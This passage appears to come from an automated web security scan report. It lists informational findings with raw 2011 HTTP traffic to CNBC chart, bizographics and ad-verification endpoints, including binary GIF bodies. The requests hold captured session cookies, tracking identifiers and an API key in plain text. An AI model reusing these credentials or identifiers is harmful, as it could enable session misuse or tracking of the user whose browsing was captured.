jiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kpy6i0cJxPYkHXgOPSTi5CoyeFhnHJRt6fLr+1OVRdX4nuCZzfuQ1VVG5sVtQXpfs93UPetTR+8CjuUaU8qI8jPKp1c+1oFzm2RW+nTi7lTLQCZ+axJebX8rUBsWyiOwvAlEla/ilc0yBK6+tzryJwZMa1HEpun+Puz+CpaUf+Y00G82XdBWMgeDBrpnrxVALpF12tvSNuZhoCA==; rsiPus_bjrC="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDE7NFqnKkHLx2BmYMObzB9/hpep6V9WP6iKbjeLhnxvCqNxuQAmHiwdDZ+f+xJ0E7g8jzc0DvGDoKVMLvpTHQqNyQHs6Exm0FAA/O2NUr6lEfJ7PQxE4W0VlVk6aXC4v9duVv1shaCwE0LAZ/Bx8Tb5hef+cEj3PLqxCnUQpfvYd7Vmm3clsezaQ3RSUGkvJtHdZ2YTGmaYEJUPbXW9WEH8qQzgpkYeDrPBH1U3bu+gJAgpsWhbrbPB62kbK9yKfTZIckBovzggyzOFwlJow83837Vp38X8J6UZ2pVRtPjL9j/uGFvaLASC9sca4eoyy1DiNYTbqM/IN0HsfsODfE/dlINqck0SuIicSHmxj6EAhObo6wIsaafDGE9dV8TyVXBo9Sr9044Ur/dRo2tn2Xw7pHX6mFkmzpuFbt1ZIR6ORC1hfMXvtKxQ3NpSyty5OFgEYkmuhKYFbFUB72lce0ts/ZWiQjV6smi6UujDfw6Yr0L1vMv1Jsna53BNhbvfJ2B08tqGXAV3vpJiDAtOJ0/CoKAPSG4e1qTnYvsLujwSsgeE/hpOstHVIZFS5jG7vOR0oYtjTMikoHR1Q1hjjKIZ/9TnXzaveyRGvBoaBt4YG3VTFSJEqIUtasV7CnjWTIvnlpWxDjc6OTo8BtlLw60LE4N3KdqbrpN0K7qAy76PhvFFYAgAbaPJNH8dXvCLCIdhJOcvm2UxwBWjcmnMmB5AjZu7tgCyGEuhEEv7sPyRc+T5nVtAYcxwHTY/H6RLgcJ7CdaBewn8gjUDrjMI6OTz2mrv6wPyDuIsIOVptpv8nTZRLacFpfvjcOnWQLZ+kMhecnNRPMgIoh+NU2sUuvyJTKBG9REg/P9a9MerxR8tW3Y5mWuZotrHq0vNX47iVAJI0Xlx0cvhd762Y2mq7CT8Mvbid9AIN5qqjJK1cuiKxnOvWrZ51MnAMQqA5UPUeoEZx75ArW3b7buDiQhQVw4CgF0cjOcMJqDqOQYGsqap8vpmJBWNnS7SbgiYqpXeT1x1s9DnlC0RFkAQsb4wqPPekz6i0ZtPjrDUo+cJIBfL1BlSYKc18etrK/Cg3ZPrZqdvIHp6VzZLOixqOtCKtElY4kh2DEYWEUWzepHNrbkpmEP1ktDcuojdoRfUcr5GE+1F3Q1CBzoV9zdnJC4ggvXN2BBcl1JSbG0P0d6PjNEtyg8il6zrUrZZuCG7fvfb0P4lQLism3igStz5Uq7Fb7O9syCEMy+HjeVUK5zG5tnMi+u5709LXeI/l7kLTEDO4kRaDQ+bD93P+QxIuFerYQ6QQ7QGa+KSvFFqt8uAPd6wMRH2je8EahQprDQTw=="; rsiPus_SZ7X="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJybh8eM9OR5om4StALLEl9sEMIKnCoBr4ThgQyPsjf9nPZuNEb4EUj7wGDPWNrTVw1j+2QxLF8RWiqhraX7I4lUnumsV/sixRxjRF5rWB9KnHODU3B/yiV30fU5WC6bOj1fDBV0DAs57Y1VM/Rqbb8VtJJSmdPuodbAFaDfdpDm6REm++yUZWODiA1PgSsK1mOBwVrBpyopchY+4OgBAcnNdBu7w/L+p4vkz7xq5Goy6VfiZ0TNBjdPo/v4CQdQttHJakZm+gPoRcnr8XH/OT/ssNoszQO2+/85IsNVqe/S5WX7jFDwYhMvDn5Dt5mB4fbOeHmBd8VRWNeibvCxdfhK2hc22Jnbs9ab301GfTUNS0KHNnyiz21S4XvPj2TGf+ubFq1Kbspi+Iy/u71WjfDeK6UVxhXUFRtNWRI+eAnzZ3LEmi3WB2PXsOqbHWAKKHyRe9v89iY73LDgm+3fBpoycGDWPFK/RsHJeHPSrtr4UAuN95pWG2/nrmDbSKCrywWqPGdlQR9/zVsvELKVta8Kb2hXgRB5SeKT4I8Qvw7LX27/fRNi/bSmgvXKzRe1hUqlRjX6XHPs0QHeDkvFoNHBHR6Ajw/tGbgLmqpOJgUt9o7kPaVvBif5zEnTpsaxS8IFKfcU+dxfWI8/CmxnYNsY7g8GpNG7aJYb9HmVwGkWUX8LwsrPfKf1pgUYxUwW6GC3lsElPdse8nLrO8xk63FbSLMq3mnzxnapoMGv13ssmyiWG7yfcatekVhCSNFYxh0/O4PhyFtH6aFfMTxZfhpvML3RCDz29z37uiFi/eAbIUlpaUtoxGe65dW0XNADXYxLM76mZA6B1NGvgLlNfdq1MdqZhZ2y9FPoHxQfhpPEdXHQHUTX8tS3khPjHiNVKZn/5bhj+gqcGf/oQMfZcoN3Dp6DcfYtghhM0eIgvjfMN0Jve6yZc402lIKLKSKBwrQdy/Ei6zTKKN66pb/n3jAd9a27M0/ZlWlqomT2Hj4S2MhD+z5axkLPP4YCgoRArhJsGijHKrvfElV/1yUCwkwEUibEPkClwAXnsJOoHSPdyZj4n6XfDf0Mr4tvd5wxRldis09GU2b6TQfka5eghlB5Gl9fE0b1lhP2hTperFRqJFCirRGPhW17dFNR5Wk1TQ3YCC9MODW3N3Gn5eOWUW/Csp76CWctZQVuOtFIlMP88TBXkoNgIVYUXxIEcco7/XHOd81bVaWrJMUoW/d6QS+puM+pHyjLbFvsZfXSNj3f20WXBKOIzVpmZism01RaqPJ/SLNkwdY7hUZuYE1k8/V9PjVOfORXn9i6+dDy+w5TA="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/zotBv0OXJiczDnb++8r/x9cboBDwW00GG7hva5IIx81wm4vtfjNktUmVF/5C6yfUn7k+WYUV3ECFN3pSpL8cGgBFDqkHe/o52XtD75xYzoIMRn7E0P7DlipjQz4QNhurmwSlvYpuxNHnaznP/JBCcOyBj4d5DyfgTVB+yyeNMcwEesXWx4Nk8Qln6Z5TvAdsntlk6mho2KcC+ZrzsPFC9Bgxy6qgpCpo5c38/g8Zwj/y35sO9Cnea0pyTEM8/IwG4gPavU+Gn5R7/nu6Mmd7C1OD5YM8jNXNLr9p/3t0ZAddAb7VXBJDm2efT8pu65sl6BoMyCy39MxKe7ZTIj8/0a7oy/QI+Lqq7Dfz4oLs1K7vfflWpyRUq3yHAMvwtSpIV6p730Q+EQVw+ZCzoIXWql+HLUfMh2mNs8YZD/HWET1lYrnDtpSXNlU/w01miBfnq6HIVzALy6lQcnIzrou7iQaYlbN3PINi/YtkLkB+1X09DMXq8Kxya/goLxHfth5ZtoFL2kQEUZaCxqBX6ENJCg0EC6bS+LJ04CK5P9gPctRmM5RIj5Ia9qr29k7uT5Y/x00fSErdDs4qDHTwsbtrFOb9aieSI10oWf7rdt434Cu50GQczE6QI6w2rnb4a3PVo/Q43Y0dEPEFCUIwxuGIpeD+g351hGAFhi0NBE+GqKdjw/aKnLKFftBAw3ZtfGMQLskKAbJ1uA4hWdUkcbUur+n8vJ8KeaY9g+FEiPuysk3UB1EnShP2fO4dI8v8MySVDt/PgQB0SuruCEWgF1oALgpaM9ds+JdiTLxevJ2pKIpAN0TAu4vB7C9+oi8WGl3BFDWADMhB9tEqNLHj+QReqAbblTXO+0Fao4ngfgqrN2TQFWWaOptLA/dMSU2rJJJBd50TeuVH5PIRurXCB/HR+udAw7vZ111gu3we846cnq8NDUohC2mGKIo+MYUANfl7mp1EH9XRY4d7jSWKgqwSFifHcMdiCtT2fJWPdPvf9ott0sj0KAjqvglA2rXRWHEQsY8gh+30uSBg55yo6tLMlQkKts2L9S5Ye1k72Ehgu9xeLwYzfZsZ8xEExAOxLFrE0Snn+O4T1y3iueXECEKftTScXRzpCsyOdAzYhhg4ZTQtujB0mEPD+ELgknFRnQze8DWyOze471+OhcuVoIJUEpjLZbHrxnBqXYBCF5AzK46mfVZ7IY/OVAGlDDGhX1hJ5l6PJudk2D5zc3lCOpAJipzS7S2QnTOBhw6RhMM25pIpmfDDfh/CHU6sZh9LQFR+dgdYZdrbxH3P7wttjQDITcOSaGwHPt86LSHS4PFtBcqpwrGw8Y9ASmBFC5Y/1lvIGCdNhjDmYdy611TnhkKU3WLdh550O2NfVbB7SmXytkIw7EOJMPb7glUobNTFDf57WbY+hkCHaICapIfleMOMzsyXzWmm/r0lEiaiGWlZ6NAKyMzTRzJtSAJJuu8pInHFdzaPdXuCzod3/5ZAYdEo4kyreOwbSeIRuR80/PxHnv+pcUMMmBl9/sQTF7sptNbiMAmrqTX4wXKyLlfn0AZWo5xJ72ILnpIBNat7RXJ7aGJgrJbXgP9b2H3E4/4BNITDrOzrZrr4zm4r+wXAyllqsEeVFu7Az5ZARlmUo0nhL7DbexToJ7NTL6de4VIUXKoB7/OUEJN0CZT2LSez2G3Hgzz0ZZYVLvR2tXfSEmJkeYzwQhsGjPoV5Sjy8APp0TX20ySt6P0ygHXl0keELI3HTra5m7YTEXvH/nW3+wD8Q"

Response 2

14.4. http://api-cdn.cnbc.com/api/chart/chart.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api-cdn.cnbc.com
Path:	/api/chart/chart.asp

Request 1

GET /api/chart/chart.asp?YYY330_VnsGsd2sggPqXYH+RDnPSUK5p/6Fy9H3Rmrlf2Avf/Q=&type=small&charttype=price&timeframe=1day&realtime=1&symbol=ETE&showHeader=&showSidebar=0&hideExchange=0&changeOverTime=0&showExtendedHours=0 HTTP/1.1
Host: api-cdn.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1930011807-1308223509319; cnbc_regional_cookie=US; s_cc=true; s_nr=1308236119534; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_2168|Q_2006|Q_2005|Q_2004|Q_2001|Q_1994|Q_1962|Q_1914|Q_384|Q_381|Q_380|Q_379|Q_378|Q_377|Q_333|Q_332|Q_326|Q_321|Q_316; USERFONTSIZE=1

Response 1

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: image/gif
Cache-Control: private
Content-Length: 3829
Expires: Thu, 16 Jun 2011 14:20:28 GMT
X-Powered-By: ASP.NET
IISExport: This web site was exported using IIS Export v4.2
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Date: Thu, 16 Jun 2011 15:00:28 GMT
Connection: close

GIF87a,............BHX.........................l
..........................................%^...........................................................................................................
...[SNIP]...
K........k..}.wt    ...O..y..............?.=.......,A....(....G... ..z.......(...*..w    .....v.........^.].j....,..b......&b...8.../.....5..b.D...,=....tC.....h...h..da    ....\v...P....f.i..W....l..e..(...e.YF.B....|....p."g.v...l    .)..d...^{B.g...9....q(..6.i..z.j.zFv...UXa.b......*...%.(_......N....b.).c.[..........l...R!..V....%....
.._.v....n.m)......b.....+....{.).|........r%P....{.'rv.A..7.0.g    \........[d........ .,..$.l1'%j...[t...%.,3.'o.j.8....^%...@.-..C..`....t.<[...PG-..TS]..Xd...[7V.`....V.m..g{M..b.=..T.-..s..T.U....|......-x.v#....'....H....G.....>...g....3>...W.....n.....x.........S...n{..?........>.~...3....'........N.....G.}.|M_.../.=........W.....o*..i...../....o.......L..?_.....7....    ......>.....,...X@    "p..[......,....... .....'...4......0t!.U..#...8...u.B$...@...g......H..
...&:..M$.H...*..@...'4...>Q..)...H.2....I..(.F....p.......$..x....S...Q.m....).:j..zLd..8.9...D.$'I.J.2#    ..&7...Nz..|...4 .R..e.L.*MyI.d.....&..&.......K. ].....B+k#.b..Rc.b0o..e:S..|H.~@.jZ.....E....YI.>..8.I.r....t.4...vRs!)....x.s....LgC...~Z..<.P@...o....M.B..P...!    ..D'J..Z......4...p.b..HGJ........JW........A.4 S
......Nw.......I.K.J...t.4...|......$.... .U.Ru.R..U..U....`.Xm.*
...hM+Z....T..W.j\.JW.fF.j.+^.J........`.K..$..7PMb...."V...,b....Z6.l.Gc..Y.r.....dG.......M.jW....6....le+.......mnuk.......p..Z..#..M.r..[.......t.K..Zw...G.d...z.....oc@......M.z.....c....|..[.......~........H...L.................A..'L.........7...{x..>..)Lb..C..N..W....#.....gL......Z..w......@...].b....HN....c!;..P.2....*[..X.r.q...{..`....L.1O..ZN.....2...p......5.y..C.....>.....t....:...)...L..F;......'=iBo#.'...7..Nw:.c"..GM.R....Nu.-M.........g=kP[H.....w.jV.G."......`........E`kK........M.j[.......mle.{...6....k.....va...v./...K..-.o.....v....~W;.4Y.....p/...H......;..........................8.@-........3,......"...fN.....8...w^s....@....Nt....HO......;..PW......[..A.......{..`..........XO...N.....a.._V!.Y...u.E..2....f#j.<..p......O......#^...{4$.w.W....;'$...d......G?z.;...O=.!...k~.....7/{........m..N.....D.0@......G~.,...;.......O...}...>.a.}..>....q.......O..........O@..O..........o.......'{..    ..{..y.w..'~..~.....~    0..x..............7...}.'..8...y.7..y..
.......4X.6..!....
.
...[SNIP]...

Request 2

GET /api/chart/chart.asp?YYY330_VnsGsd2sggPqXYH+RDnPSUK5p/6Fy9H3Rmrlf2Avf/Q=&type=small&charttype=price&timeframe=1day&realtime=1&symbol=ETE&showHeader=&showSidebar=0&hideExchange=0&changeOverTime=0&showExtendedHours=0 HTTP/1.1
Host: api-cdn.cnbc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1930011807-1308223509319; cnbc_regional_cookie=US; s_cc=true; s_nr=1308236119534; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_2168|Q_2006|Q_2005|Q_2004|Q_2001|Q_1994|Q_1962|Q_1914|Q_384|Q_381|Q_380|Q_379|Q_378|Q_377|Q_333|Q_332|Q_326|Q_321|Q_316; USERFONTSIZE=1

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3844
Content-Type: image/gif
Expires: Thu, 16 Jun 2011 14:20:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
IISExport: This web site was exported using IIS Export v4.2
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Date: Thu, 16 Jun 2011 15:00:35 GMT
Connection: close

GIF87a,............BHX.........................l
..........................................%^...........................................................................................................
...[SNIP]...
K........k..}.wt    ...O..y..............?.=.......,A....(....G... ..z.......(...*..w    .....v.........^.].j....,..b......&b...8.../.....5..b.D...,=....tC.....h...h..da    ....\v...P....f.Y..W....l..e..(...e.Y'.i....|......
g*r&h..x.i..d.......W...9(*s.)...&.(U.:....
......d.V.)...*....jkg...h...j............."+@.c,....:....T....b[..at...a.......m.......f...g%.....k....K.._...........l0..z"g..t..........Wlo.......w...^%...$.l..'c.I..x... /...4...&.f...<..3XZ.-..D.]..    fAa.Lg.3.WD-..TW]...`...\w...J%`..dK...h....V....e.M5.T.m..xS.6R    T.........S...w.....7.w..H....Wn..R(.S.St......:......>%.........C.....n{....:....:.O./......L...|..7....G...t9....c...._.W...w....GO.J    d.........Gvkf.(a.............K.......e......H@.2.r........:...t`.....n.~....(...,..'..
......./\..4......8.!    G..#...@....8C$...HLb.wh.!:..?....H.*Z..L.I.... .(Ss....HF2fQ#    (.....6....a..(4G....x....x..........S...Q.u......>b....$.    9.9...T.&7...N^...    .(GI.R.......4..V.re...,e    ..$.....(..&......0K. a.....f-.rK]:..0!&...._....<.2....x.....8.i.9.1AV......v......6...q....\..|..Bf,..h<.i.|.........N.......D'J..V...I@.6...z......(4Rt....;.JW.......%..fJ.....7.g.r...Rh.>..P.J.....;..?....:..:%jO.:.&.Z..DU*=p...p..^.*W..........Z..V...Bm..\.JW.R..xkY.*....~tU...*.....j..b....f&.7..j$...J6....f#.V.z..u.+< k..n6..E-j9;
......lgK.......mv.[......-p.;........r.....V.    0.t.K...v....v....z...}n:. ......Moz..........|.K....<...~..\.........L......H.......;......'L.
...,...7.`.... ...GL.........9.b..C.'...g......8...w.c...B+....L."...HF.....&;..P.r...*[..J^27....{..`.s...2...hN.....6ky.b....L.6...x^.....9......
.M.B....N.....=S...t.M@.J[......7.i.8.>'...GM.R.:.c"..W..V.......I.i........w.kT[H........Z..D."......d/...V..E..L..........n{..!064...r;[......M..j.........z...."w...ltC{...5..=......~.....i.......&N..[......7n..... ...@....|/!Gy.A.j....0..........8.9.=......@....Nt....    .......;.......N..[..X....~tb$..`...Q......hO...............t....x.{....U..`.}...e1..........?..8......'O..[~.|.....y........9.y.$ ..O..W.z.'......a....~.....qO...^...=.q.{.w.....&....;....~..`..[..........k......s.......?~...|......}.(@........*..........8......~.G~..~.'z.P~.G|..~..~..    ........... .."8.$X.&x.$x..x|..y+x.......|,.x......:.(.
...[SNIP]...

14.5. http://api.bizographics.com/v1/profile.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Request 1

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe08y7VMjWLN6FExkNK7HUtFp4B4dlWpgdgD0CnxkWGt3T8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response 1

Request 2

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe08y7VMjWLN6FExkNK7HUtFp4B4dlWpgdgD0CnxkWGt3T8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response 2

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 16 Jun 2011 11:22:40 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 21
Connection: keep-alive

Unknown Referer: null

14.6. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102761/PortalServe/

Request 1

GET /rjss/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1; JSESSIONID=C63ED20ECB256E0453300D10DB035B27

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1041BD66C9B7C74AE39CEFC5E2980294; Path=/
Content-Type: text/javascript
Content-Length: 8151
Date: Thu, 16 Jun 2011 14:13:59 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

